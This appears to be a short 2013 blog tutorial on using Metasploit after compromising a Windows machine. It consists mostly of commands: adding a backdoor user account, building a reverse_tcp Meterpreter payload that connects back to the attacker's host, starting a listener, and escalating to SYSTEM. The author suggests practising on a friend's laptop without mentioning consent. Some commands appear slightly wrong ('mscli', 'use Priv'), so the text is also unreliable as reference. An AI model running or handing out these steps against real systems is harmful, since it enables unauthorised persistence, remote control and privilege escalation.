Skip to content

METASPOILT – Beginners Guide – Tutorial on How to create New Users

09/07/2013

Once you’ve penetrated the victim, create a fake user account.

Step 1 – Create New User

net user OMG password /add

****

Step 2 – Arm the Payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.x.y LPORT=443 X > payload.exe

LHOST = That’s your IP.

As I love you so much, please don’t attack the BBC, regardless of how bad their scheduling has been. Use your internal home network to do this – attack your best friends laptop, on your home router.

*******

Step 3 – Prime the Victim to call us

mscli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.x.y LPORT=443 E

******

Double Check your work so far

getuid

(Server\OMG)

******

Drop into a Shell and double check the Group rights for OMG

shell

net user OMG

(Local group memberships will be listed)

(Global group memberships will be listed)

*******

Now Escalate OMG to System Rights

use Priv

getsystem

getuid

*****

Full Credit to:

KENNEDY et Al, 2011.  Metasploit The Penetration Tester’s Guide.  No Starch Press.

Advertisements
Leave a Comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: